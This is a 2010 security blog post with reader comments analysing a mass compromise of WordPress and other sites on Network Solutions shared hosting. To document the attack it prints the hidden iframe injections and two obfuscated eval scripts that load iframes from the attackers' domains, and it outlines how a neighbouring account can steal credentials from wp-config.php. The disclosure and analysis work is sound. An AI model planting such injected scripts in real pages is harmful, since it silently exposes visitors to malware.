msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Network Solutions and WordPress Security Flaw

   11 Apr 10   Filed in Website exploits

I first noticed this hidden iframe from hxxp://networkads .net/ grep/ on April 7. It instantly drew my attention with these weird “iframe_style” scripts in Unmask Parasites reports (I even thought it was a bug in Unmask Parasites, but when I checked the infected site, I found those scripts there).

weird scripts

However it was a single incident and I didn’t see any obvious pattern back then. Two days later, when I noticed David’s (Sucuri Security) article about this very issue and the follow-up by Brian Krebs, I decided to take a closer look at it. What I found is quite interesting and raises a few serious questions about security of websites on shared servers.

Quick recap of David’s and Brian’s articles

1.Many WordPress blogs on have been recently hacked. Someone has injected the following iframe that pushes malicious content from networkads .net server

<iframe style="display:none" height="0" width="1" src="hxxp://networkads .net/ grep/"></iframe>

2. The injection was done via WordPress database. Hackers replaced the value of the “siteulr” option in the “wp_options” database (table prefix may be different in you case) with the iframe code:

<iframe style=\"display:none\" height=\"0\" width=\" 1\" src=\"hxxp://networkads .net/ grep/\"></iframe>'

3. This dumb modification of the siteurl parameter breaks most blogs (both visually and functionally) since there are many dependencies on the the siteurl parameter in WordPress. So Webmasters need to manually revert the value of this parameter to the correct site URL in their MySql database (it should be something like: http://yousite.com/blogroot ).

4. All affected sites are hosted by Network Solutions.

My findings

Google search

The hack breaks HTML code. This is a typical line of HTML broken by this iframe injection:

<link rel="pingback" href=""><iframe style="display: none" height="0" width="1" src="hxxp://networkads .net/ grep/"></iframe>/xmlrpc.php" />

Since most WordPress themes actively use the siteurl parameter in the <head> section of HTML, this broken code makes them look like this:

broken blogs

which makes it possible to compose a Google search query that will return similarly hacked blogs. For example: wp-content text/css media screen xmlrpc.php -pingback – this search produces about 5,000 results. Many of them point to the hacked blogs. These 5,000 of course include multiple indexed pages from the same sites, but I still could easily find more than 60 infected blogs on the first 10 pages of search results. (Warning: many blogs are still infected at the moment of writing.)

Network Solutions only

All those blogs are hosted by Network Solution. Not a single infected site outside of their network. This means that this specific attack is limited to Network Solutions servers.

Server IPs

Most of the infected blogs (40+) are on the server with IP address: 205.178.145.65

I also found similarly infected blogs on 16 more Network Solutions’ IPs:

205.178.145.85
205.178.145.86
205.178.145.99
205.178.145.105
205.178.145.116
205.178.189.131
206.188.192.204
206.188.193.32
206.188.193.63
206.188.193.63
206.188.193.64
206.188.193.179
206.188.193.195
206.188.193.220
206.188.193.250
206.188.196.127
206.188.211.27

Not only a database hack

Not only does this attack inject the iframe code into WordPress database, on certain sites hackers also inject the iframe code (slightly modified) directly into file on disks.

<iframe frameborder="0" onload=' if (!this.src){ this.src="http://networkads.net/grep/"; this.height=0; this.width=0;} '></iframe>

The places of injection suggest that the code was not taken from database.

Other Domains

networkads .net is not the only domain name used by this attack. Before it, hackers used binglbalts .com/ grep/ and now they use mainnetsoll .com/ grep/.

This three domains point to the same server with IP address 64.50.165.169 (Lunar Pages) which seems to be a hacked dedicated (or virtual dedicated) server with several legitimate sites.

According to whois:

  • binglbalts .com – created on Apr 01, 2010
  • networkads .net – create on Apr 04, 2010
  • mainnetsoll .com – created on Apr 10 2010

Inspite of such a short history, according to Google Safe Browsing database, binglbalts. com and networkads.net have already changed several servers on 3 different networks.

Update Apr 13, 2010: It just occurred to me that this mainnetsoll .com domain name almost directly tell that this attack specifically targets Network Solutions (NetSol) – mainNetSoll .com

Update: obfuscated script

When I published this article I checked the compromised sites once more and discovered this obfuscated script on one of them:

e v a l(function(p, a, c, k, e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('h f(a,8,d){6 3=i m();3.l(3.k()+(d*n));6 5="; 5="+3.j();4.9=a+"="+8+5+"; "}6 c=4.9;b(c.v("g")==-1){4.o(\'<e w="0" y=\\\' b (!2.7){ 2.7="t://u.p/q/"; 2.r=0; 2.s=0;} \\\'></e>\');f("g","1",x)}',35,35,'||this|date|document|expires|var|src|value|cookie|name|if||hours|iframe|addCookie|seref|function|new|toGMTString|getTime|setTime|Date|3600000|write|com|grep|height|width|http|mainnetsoll|indexOf|frameborder|24|onload'.split('|'),0,{})) ;

It was right after the <body> tag.

What this script does is checks if there is a cookie called “seref“. If there is no such a cookie, it injects a hidden iframe from hxxp://mainnetsoll .com/ grep/, and then sets this “seref “cookie for one day.

As you can see the attack constantly evolves, and this time the malicious code is directly injected into some WordPress file.

Other hacks

It looks like these latest iframe injections are not the first time when WordPress blogs on those Network Solutions servers are being attacked by hackers. I can still see signs of other attacks.

Some of the hacked sites contain hundreds of spammy links that can only be visible if you browse with disabled JavaScript. For some reason, every link is enclosed in <noindex> tags and use rel=”nofollow” in <a> tag’s parameters. So what’s the use if it is neither for normal web surfers nor for search engines?

The links are followed by the networkads hidden iframes.

alkoltashov.narod.ru

I also found a dozen of infected WordPress blogs that try to pull hidden spammy links from hxxp://alkoltashov .narod .ru/ sites.txt. The links are supposed to be displayed in a <div> located way outside of the visible area, but because the configuration of Network Solutions servers that disable URL file-access, those link injections fail with the following error (which is also displayed outside of the visible are ):

<div style="left: -2322px; position: absolute; top: -3433px">
Warning: readfile() : URL file-access is disabled in the server configuration in /data/path/to/the/user's/account/wordpress/wp-content/themes/themename/header.php on line 163
Warning: readfile(hxxp://alkoltashov .narod .ru/ sites.txt) : failed to open stream: no suitable wrapper could be found in /data/path/to/the/user's/account/wordpress/wp-content/themes/themename/header.php on line 163
</div>

According to Google cache, this unsuccessful remote link injection happened back in January.

And it is also limited to blogs on Network Solutions servers.

WebEasySearch .com

Some of the hacked blog also redirect search engine results to webeasysearch .com site. And this only happens if you haven’t visited the hacked blogs before (must be checking WP cookies).

This hack encrypts the search engine’s query string, and then passes it to the webeasysearch .com site which decrypts it and displays it’s own search results for the same query.

I bet it is done by some PHP code injected into WordPress files.

The style of the hacks and the range of the affected sites make me think that all those hacks were done by the same hacker.

Update Apr 16, 2010: Found an alias of this site: sbdtds .com. It is used via an injected script. Both sites are hosted on the server with IP 91.205.96.8 (Netherlands, Todayhost Limited)

Update Apr 16, 2010: Cloaked spam

During the investigation of another black-hat SEO case, I noticed that a familiar IP address:  205.178.145.65. This is the most affected by this WordPress hack Net Sol’s server.  I knew it was not just coincidence and decided to find out the scale of this problem.

Using search engines, I found 144 unique hacked sites with spammy pharma links on this server. Moreover, when I checked those sites with Unmask Parasites, more than 100 of them were still infected.  Not only WordPress sites are affected. Cloaked spammy content is also found on Joomla sites and even on simple HTML sites.

This server is actively exploited by hackers. If your site happened to be hosted on this server, move ASAP. This is a really bad neighborhood. There are a lot of abandoned sites with vulnerable old versions of popular web applications – so hackers will easily regain access to it even if Net Sol change every password on this server.

Conclusion

1. The hackers definitely target WordPress blogs, but I doubt any WordPress vulnerability was used. Otherwise we would see similarly hacked blogs not only on the Network Solutions servers.

2. At the same time more than a dozen of Network Solutions servers are affected. There might be a security hole (or a least flaw) on their network. They should seriously investigate this issue.

3. I agree with David from Sucuri Security who thinks this can be done via access to a single compromised (or even legally created by hackers) account. Hackers can use this account to execute scripts that read content of wp-config.php files on neighbor accounts (according to reverse IP lookup there are several thousand sites on the server with IP 205.178.145.65).

It is quite easy (I won’t give out the tricks to wanna be hackers here but they work well on Network Solutions servers) to identify sites with WordPress blogs on any server and then identify absolute paths to wp-config.php files that contain database credentials, and names of WordPress tables – all in plain text. Then hackers simply need to run another script that injects whatever they want into databases of their server neighbors.

Similarly, any malicious code can be injected into any writable files under neighbor accounts.

WordPress design flaw

On shared servers, you can protect your own files from malicious neighbors making them read-only. Usually 644 file permissions and 755 directory permissions do the trick.

However, if neighbors somehow get your database credentials, they can do whatever they want with your database. In case of WordPress, it’s enough to read the wp-config.php file in the root of a WordPress blog.

To hide the content of the wp-config.php file from server neighbors, David (Sucury Security) suggests that this file should have 750 permissions (I guess he meant 640 since the execution permission is not required). Unfortunately, this trick will only work on servers with suPHP. On other servers where web server executes PHP scripts with its own rights, this trick will completely break WordPress blogs. Every page will produce the “Failed opening required ‘wp-config.php’” error.

This means that WordPress blogs on most shared servers are vulnerable to this sort of attack. It merely takes to hack one account (most shared servers have multiple hacked accounts) or even to create a regular account specifically for hacking purpose and you can steal MySQL database credentials of your neighbors with WordPress blogs. Any other database driven web scripts that store database credentials in plain text are also vulnerable.

Guys from WordPress are aware of this problem on shared servers but for some reason they also give this strange advice about 750 permissions for wp-config.php that both incorrect (750 instead of 640) and will only work for suPHP server:

Note that if you are on a shared-server the permissions of your wp-config.php should be 750. It means that no other user will be able to read your database username and password. If you have FTP or shell access, do the following:

chmod 750 wp-config.php

So at this point, there is no universal way to protect your database credentials on shared servers. At the same time, I see more and more attacks where a compromise account on a shared server is used to hack other sites on the same server. It’s time to revisit the approach used in the wp-config.php file.

Have your say

What do you think about this issue with world-readable wp-config.php files on shared servers? Any thoughts on how to mitigate it?

If you are a Network Solutions client with a hacked site, I’d also want to hear about your experience. Could you tell us about file permissions you use (especially if you were hit by those alkoltashov .narod .ru and WebEasySearch attacks)?

Any other comments are also welcome.

Related posts:

Reader's Comments (48)

  1. |

    [...] This post was mentioned on Twitter by Denis. Denis said: [blog] Network Solutions and WordPress Security Flaw http://bit.ly/b3qJzG – my take on the mass compromise of WP blogs on NetSol network [...]

  2. |

    Hi .

    I work for Network Solutions and wanted to get in touch and compare notes. you can reach me at my signature below at network solutions.com

    Shashib

    • |

      Shashi,

      I emailed you my list of the still infected sites. Hope it will help.

      I expect that you can share some details about the non-DB injection mutations of this attack.

  3. |

    I’m glad I found this. My client has this issue. The blog doesn’t work now and this is the second time he was hacked on NetSol (the first time he didn’t have a blog). It’s frustrating that such a big company as Network Solutions allows this, given the premium price they charge. I told him it’s time to get out of Dodge.

  4. |

    Thank you for explaining this. I am not a developer just a user of wordpress at Network Solutions. Would you know where I could find the remedy to fix my site at this point? To remove the bugs? Thanks, Nancy

  5. |

    Not only network solutions hosted website have that hack.
    Check the url.

  6. |

    Our first attack was Friday April 2nd in the footer, then April 4th in the header and then an all out assault and take-down on April 8th with dozens of iFrame inserts all over the page.

    We are live this morning, crippled but live.

    It seems from your comment that other hosts like GoDaddy might be subject to the attack if they have lots of WP sites.

    NS are in high denial publicly.

    What is the solution? Private hosting, host your own?

    • |

      I didn’t see any site on GoDaddy affected by this particular attack yet, but potentially more than half shared servers are vulnerable to this sort of attacks.

      For some people dedicated and virtual dedicated servers are they way to go. Unfortunately, it’s more expensive and may require substantial server administering expertize (otherwise you can leave security holes wide open even on private servers)

      On shared servers you have to be very carefull about file permissions (especially if suPHP is not used). On the other hand, suPHP servers are more vulnerable to script exploits.

      P.S. You should always have good backup/restore strategy so that you can recover from any hack as soon as possible. And of course, you should be monitoring your site integrity.

  7. |

    Mine is infected. I noticed it Friday 4/9. I have a sub-domain pointing to it I use so I redirected. It already is reported as unsafe to smartscreen filter. Probably several others.

    Network Solutions offered a link to an article so they are aware. Here is the article if you are interested.

    http://blog.networksolutions.com/2010/alert-wordpress-blog-network-solutions/

    Going to read it now and see if I can fix it.

    • |

      Unfortunanely, this article doesn’t provide a 100% working solution. All those advices leave your blog potentially vulnerable to next rounds of hacks.

  8. |

    I work for Network Solutions and wanted to update you folks on the latest post that may help http://blog.networksolutions.com/2010/update-for-word-press-customers/.

    Thanks,

    Shashi

  9. |

    Network Solutions Ticket#1-460208121

    I’ve had an engineer watching and fixing my site based on the NS instructions and updates provided and the site has crashed and uprighted no less than 7 times in the last 5 days.

    I’m a small business owner and can’t afford another dime in engineering fees to repair this moving target of an issue. Today might site is still down. Network Solutions is killing my business and now I can’t even afford to pay for an engineer to fix the issue.

    I’m held hostage and it sucks to be treated this way.

    -Chris Bell
    —-
    Edit by Denis. Chris, I removed your site link from the signature since the site hasn’t been fixed yet.

  10. |

    [...] Other hacks discovered [...]

  11. |

    Not even going to bother with a ticket. I’m moving from network solutions. My site wasn’t even live (in a development folder) and it was hacked.

  12. |

    Very interesting! I salvaged a client blog this week when Network Solutions was unable to resolve the problem after 3 days.

    My client was very unhappy with Network Solutios already. We decided to move their entire site to a new hosting account.

    Before making nameserver changes, I installed the site in a temporary folder. When the database import showed the same error, I dug into the database and noticed this iframe code in the database site url column of the options table. The site came up fine and all that remained to do was to re-attach images to posts. That’s a whole ‘nuther story. :)

    After everything was in place so my clients could check it out, I went back to the Network Solutions database and removed the malicious iframe code from that table to no avail. Your post possibly explains why this had no effect.

    After the site was checked out in the temp folder and found to be whole, we initiated the nameserver changes and put it up on its own domain. As of this morning, the registration has been transferred to another registrar too.

    I’m not at all impressed the ability of Network Solutions to handle wordpress after woring with their “WordPress Hosting” package, which I couldn’t talk another of my clients out of buying. I couldn’t add plugins or different themes and called to ask why. I was told that “this was the way that it was setup.” With all due respect, one can get that for free at WordPress.com.

    The best part is this: A Network Solutions tech support person told me they wouldn’t use the package. Now, that’s a heck of a testimonial, isn’t it? :)

  13. |

    The real problem is that NetSol is really lame hosting. Everything is easily readable without any hacking skill.

  14. |

    not sure if i found agreat solution or not. but works!
    You have to change back in the DB > wp-options(table) > siteurl > hereinsteadof the iframe shit you put only your url (http ://…)
    For me this sort of work i think.
    After doing this change all the passwords you can even for the DB and CHMOD all files so they are secure.
    Hope it works for you..

  15. |

    Add my site to the list of hacked sites. Also Network Solutions is down right now so I can’t even login to transfer to another registar (9:52 CST 4/15/2101). I’m not sure if Networksolutions being down is related to the site hacking. Regardless this pisses me off. Network solutions just lost my business.

  16. |

    My site which has only been up for a week was hacked. I do not host a WordPress blog, but rather, vBulletin 4.0.3 Publishing suite with CMS (articles, blogs, forums). Are we sure that these attacks only limited to WordPress???? Here are the details of my incident today.

    In several php files, including index.php, the one in root and the one in an administrative folder were completely emptied. 0 bytes. Nada. There were at least 7-10 other php files between root and and my admin folder that were affected. I have not changed anything in the header includes and footer. I had not made any changes that should have caused this. I tried restoring my site and db. Within 45 minutes, the site was down again. The error on my home page was:

    Parse error: syntax error, unexpected ‘<' in /data/21/2/91/95/2091747/user/2293542/htdocs/index.php on line 71

    I opened index.php via filezilla and the following code was appended to the end of a perfectly fine file, just after the end of the last comment int he file. Also, my permissions on the file are 660.

    eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(‘h f(a,8,d){6 3=i m();3.l(3.k()+(d*n));6 5=”; 5=”+3.j();4.9=a+”=”+8+5+”; “}6 c=4.9;b(c.v(“g”)==-1){4.o(\’\');f(“g”,”1″,x)}’,35,35,’||this|date|document|e xpires|var|src|value|cookie|name|if||hours|iframe| addCookie|seref|function|new|toGMTString|getTime|s etTime|Date|3600000|write|com|grep|height|width|ht tp|corpadsinc|indexOf|frameborder|24|onload’.split (‘|’),0,{})) ;

    I performed a complete restore of the web and db and everything is fine for now.

    Edit by Denis: I removed your site link from your signature since the site problems are still not fixed.

    • |

      Hi Jacob,

      Thanks for the update. This script injects a hidden iframe from corpadsinc .com/grep/.

      This site has the same IP: 64.50.165 .169 as those networkads .net, binglbalts .com and mainnetsoll .com and the same URL structure /grep/ so it’s definitely the same attack.

      So it must be not WordPress only.

      However, the 660 file permissions may suggest that your site credentials have been stolen by hackers or the server is compromised at the root level.

      Even if it’s a problem with your compromised credentials, why does this attack only affects sites on Network Solutions? I wonder if hackers managed to steal those credentials directly from some Net Sol database?

      Anyway, change your passwords ASAP.

      • |

        I’ve restored my site and am changing my passwords now.

        Directories with 755
        Files with 644

        Is there anyplace in the DB itselelf I need to check? I do not have a stored proc to find a specific string searching every column of every table. I could get one if necessary. I’m not sure what table would be affected as this is not a wordpress site. It’s a vBulletin 4.0.3 site.

        • |

          In this case it is not a DB hack. There error clearly says that hackers messed with your files on disk.

          “644″ or “660″ as you said in your previous comments?

          Anyway, is suExec or suPHP used on the server?

          • |

            My files were originally 644, then changed to 660 during this hack, and now I’ve changed them back to 644.

            SuExec
            PHP Version 5.2.6
            System Linux vux72 2.6.22.10
            Server API CGI/FastCGI

            MySQL client version: 5.0.75
            Server: Localhost via UNIX socket
            MySQL charset: UTF-8 Unicode (utf8)

  17. |

    Of course it’s not a WordPress problem, any CMS/forum has to store database credential in a plain text file (that’s why vBulletin got hacked too).

    The real problem is Network Solutions’ lame server configurations. Nobody should be able to see someone else’s file on a shared server.
    So do yourself a favour and change hosting provider.

    More details:
    http://wordpress.org/development/2010/04/file-permissions/

    • |

      This time it doesn’t have to do with database credentials. Hackers inject the malicious code directly into files on disk. And it looks like the server configuration (suExec) and file permissions (644) are strict enough to prevent neighbor hacks.

  18. |

    Add NS server 206.188.192.32 to that list.

    All my index.php files we’re hacked today around 2:43PM and long and nasty scripts inserted. And also in SMF index files.

    Total nightmare. Others are reporting the same.

  19. |

    My Network Solutions site and WordPress blog was hacked sometime on April 8. I found that the siteurl entry for the blog was changed in the wp_options table in the database.

    I was able to edit the entry, but the site did not come back until after I reinstalled WordPress and upgraded.

    I have altered the permission settings as you suggested but I see that will not protect the database proper.

  20. |

    Gee I wish I’d found this a few weeks ago! On April 4th I lost half my database and I really thought I’d messed something up until I found the redirect iframe in the site url (thanks to a search on wordpress hacks). I restored my database from back up and checked it was clean and everything was fine.

    A few days later I found my site was completely locked out from the public. I couldn’t get in to do anything or check it out … nor could I log in to network solutions. Eventually when NS came back up for me (my site was still down) I found my database password changed (no explanation as to why) … I rewote my config file with the new password and reset all my permissions …they seem to have been rewritten all over the place with php files readable and executable publically.

    I reset all the permissions including 640 on the config file and everything was fine (mind you it took a few hours to work this out). A week later NS emailed me to let me know they’d changed my password and I should check my file permissions etc. Gee thanks for the speedy info guys!

    Today the same hack happened again and you need to remember my permissions were correct when this happened (although the restore from back up is wrong on permissions, I change it manually each time I restore). Today all my FTP passwords were changed for me with no notification … I’m sure they’ll tell me in a weeks time however.

    Given I had the correct permissions in place to begin with, I’m not sure how it can be a wordpress problem … especially as this specific hack seems to affect network solutions blogs only. I’d also like to point out that my initial wordpress install was done by NS itself and I had to change permission on the config file manually as the NS install set it at 644!!!

    If you want any other info you can write to my email. I’ve cleaned the site again, but who knows how long that will last. Any recommendations for a safer host?

    Stuart

    Edit by Denis: I removed your site link from your signature since it’s still not guaranteed to be safe…

  21. |

    I should have mentioned … I’m on the 205.178.*.* ip also.

  22. |

    2:15pm 4/20/10 script insertion attach on NetSol hosting.

    Immediately after the body tag the script in question sticks out.

    http://www.flickr.com/photos/macewan/4538895496/

    • |

      Thanks Robert,

      I see this script on quite a few other sites on Net Sol hosting.

      • |

        Yesterday morning I discovered that same script inserted into every page on my site named either ‘default.*’ or ‘index.*’ — about 20 instances. I removed them all, only to have them put back repeatedly over the last two days.

        Noob question: It’s a vanilla html site. Everybody talks about making sure that the file permissions are accurate — would that be 755 for directories and 644 for files, or should I be locking it down further than that?

  23. |

    Just removed a maliciuous script that was just behind the body tag on a very basic html site. Now I also remember that we had some trouble with our ftp passwords and logins. ‘Someone’ had changed them. We tried to contact NS. But they never bothered to answer.

  24. |

    I had to remove the malicious script again! So something is putting it back again every time I remove it? Nice one NS!

  25. |

    The attack continued on Tuesday night with two more sites I know taken down.

    NetSol hasn’t found the source yet.

  26. |

    This is bullsh*t.

    I have two blogs on my site and both got hit in the hacking earlier in the month.

    Now today I’ve been hit three times with the new javascript hack.

    I upload clean copies of the files and they come back in less than an hour or two and replace them with infected versions.

    I’ve logged in and tried changing my FTP password using the Network Solutions site administration panel and the change won’t go through.

    When they changed the passwords on my databases (for the earlier blog hack), they disabled the automatic database back-up and I can’t re-enable it because the control panel keeps giving me a warning about the database user name. Which I tried changing back when the blogs were being hacked (along with the passwords) but that change wouldn’t go through, either.

    They reset the permissions on all the PHP scripts on my site to 640 or the like, so every time one was accessed, the server threw a “mod_mime_magic can’t read file blahblah.php” error. So I was getting error logs running anywhere from one third to half the size of my access logs.

    I filed a service request and they emailed me back saying it had been resolved.

    It hadn’t. Eventually I bitched enough that they left the file permissions at 644 when I reset them. (I’d set them to 644 to stop the errors and they’d reset them to 640.) They’ve also done something to my log directory so that I can’t delete the old logs now.

    And just when I thought things were going to be OK, this javascript hack pops up.

    This is ENTIRELY an internal security matter, I’m convinced of it.

    Can you suggest a better provider? I’m just about ready to move.

    • |

      I guess they are trying to fix things in a hurry and introduce new bugs (one fix may break other things). It may take weeks before they test the changes and the things settle down.

      At this time, moving to some other service provider is a wise step. While shared servers cannot guarantee high level of security, you can try to find at least a more stable service, which won’t reset your settings several times a week.

  27. |

    In the time it took me to type my comment here, they hacked in and inserted the script again.

    This is ridiculous.

  28. |

    We shared-hosting customers are screwed. For now anyway. Isn’t that basically the bottom line?

    I mean we’re supposed to be responsible for application-layer security now?

  29. |

    I have several sites that have been attacked as part of this whole WordPress/Network Solutions debacle. And I do want to move. It’ll have to be shared hosting. I realize you don’t want to recommend one service over another (I guess they all have problems), but can you at least tell us what you think of BlueHost (recommended by WordPress.org) and if you know how they handle security?

  30. |

    Remove or rename the following files in cgi-bin if present:
    counter.cgi
    monthdir.pl
    php.ini
    Check the contents before you do it!
    In my case they were all part of the malicious code.
    For the moment my site is clean and working without troubles.

  31. |

    Add me to the list… This is a total nightmare. I designed my company’s website, and set up the wordpress plugin. I really don’t know that much about websites, and we are a small 10 person engineering company, who really can’t dedicate time/money to this…

  32. |

    [...] Fonte: Network Solutions and WordPress Security Flaw [...]